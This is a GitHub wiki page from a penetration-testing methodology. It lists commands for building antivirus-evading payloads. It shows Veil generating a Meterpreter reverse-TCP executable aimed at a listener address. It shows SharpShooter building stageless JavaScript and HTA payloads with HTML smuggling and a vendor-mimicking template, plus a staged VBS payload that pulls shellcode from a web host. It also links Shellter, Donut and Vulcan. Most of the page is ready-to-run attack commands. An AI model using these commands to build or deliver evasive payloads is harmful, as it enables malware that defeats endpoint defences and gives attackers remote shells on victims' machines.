Bypassing AV

Bypassing AV

Veil Framework:

Install on Kali:

apt install veil
/usr/share/veil/config/setup.sh --force --silent

Reference: https://github.com/Veil-Framework/Veil

Generate exe example:

$ veil
> use 1 (Evasion)
> use 11 (cs/meterpreter/rev_tcp)
> set LPORT 4442
> set LHOST 10.52.252.94
> set USE_ARYA Y
> generate
$ ls /var/lib/veil/output/compiled/

Shellter

Source: https://www.shellterproject.com/download/

apt install shellter

Sharpshooter

Javascript Payload Stageless:

SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

Stageless HTA Payload:

SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

Staged VBS:

SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

Reference: https://github.com/mdsecactivebreach/SharpShooter

Donut:

Source: https://github.com/TheWover/donut

Vulcan

Source: https://github.com/praetorian-code/vulcan

Bypassing AV - TheGetch/Penetration-Testing-Methodology GitHub Wiki

Veil Framework:

Shellter

Sharpshooter

Donut:

Vulcan

⚠️ **GitHub.com Fallback** ⚠️

⚠️ GitHub.com Fallback ⚠️